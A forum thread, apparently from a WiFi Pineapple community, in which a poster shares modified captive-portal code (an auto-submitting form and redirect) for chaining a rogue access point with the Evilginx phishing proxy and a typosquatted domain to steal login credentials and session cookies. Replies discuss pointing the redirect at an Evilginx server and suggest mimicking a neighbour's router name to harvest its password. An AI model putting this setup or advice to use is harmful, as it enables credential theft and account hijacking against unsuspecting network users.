Jump to content

Evil Portal ++


Recommended Posts

I created a custom Evil Portal landing page for the WiFi Pineapple. On joining the rouge access point Evil Portal opens up a Captive Portal. This is what normally is used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way usually with the Pineapple. However, I wanted to do something different. I wanted to send the users to another site after they register.

By adding a line of javascript to the body tag in the evil portal index.html page, the javascript automatically triggered the form button on the page. Then I changed the code which refreshed the evil portal page after the form button was triggered to load the page I wanted.

Finally I installed Evilginx on the new server. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Once that was up & running I squatted on another domain name. Replacing one letter of the name with a dash. It was something like www.mydom-in.com

The website stole the cookies and allowed me to hack my own account. However, my domain name was seized by the courts recently. Even though I never hacked anyone but myself. I have been keeping all of this & my code secret but don't want my adventure to be lost.  So here you go guys!

I changed this in index.php:

<BODY onload="document.forms['member_signup'].submit()">
       <div style="text-align: center;">
            <h1>Connecting to WiFi.</h1>            
            <p>The SSID you are connected to is <?=getClientSSID($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your host name is <?=getClientHostName($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your MAC Address is <?=getClientMac($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your internal IP address is <?=$_SERVER['REMOTE_ADDR'];?></p>

            <form method="POST" action="/captiveportal/index.php" name="member_signup">
                <input type="hidden" name="target" value="<?=$destination?>">
                <button type="submit">Authorize</button>
            </form>

        </div>

    </BODY>

Change this in /www/captiveportal/Portal.php:

    /**
     * Where to redirect to on successful authorization.
     */
    protected function redirect()
    {
        header('Location: https://www.google.com');
    }

    /**
     * Override this to do something when the client is successfully authorized.
     * By default it just notifies the Web UI.
     */
    protected function onSuccess()
    {
        header('Location: https://www.google.com');
    }

 

Link to comment
Share on other sites

  • 4 weeks later...
  • 1 month later...

I got the evilginx2 server set up and somewhat running on my VPS a while back, but in respect to the pineapple where it forwards the user to the evilginx server.

Where you mentioned it forwards the user to an evilginx server, just a change where  header('Location: https://www.google.com'); from google to the link of the evilginx portal? Thats where I'm tryna get between both the pineapple and evilginx server for the user from a captive portal through the pineapple.

Link to comment
Share on other sites

  • 2 weeks later...
Posted (edited)

Have you got it to work yet? I haven't played with the pineapple in awhile. I did have another idea however.  You can give the access point any name you want. So why not typo-squat? Like if you know your neighbors router is myATT123 set yours to myATT123-5G. Then they might think it's an upgrade.

Edited by Street
Link to comment
Share on other sites

On 8/4/2021 at 4:13 AM, Street said:

Have you got it to work yet? I haven't played with the pineapple in awhile. I did have another idea however.  You can give the access point any name you want. So why not typo-squat? Like if you know your neighbors router is myATT123 set yours to myATT123-5G. Then they might think it's an upgrade.

No, I haven't gotten evil portal & Evilginix to work yet on the portal where it pertains to social media captive portals to validate the login credentials and get a session cookie.

The suggestion you said about gathering router passwords with mimicking the AP name is accomplished easily.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...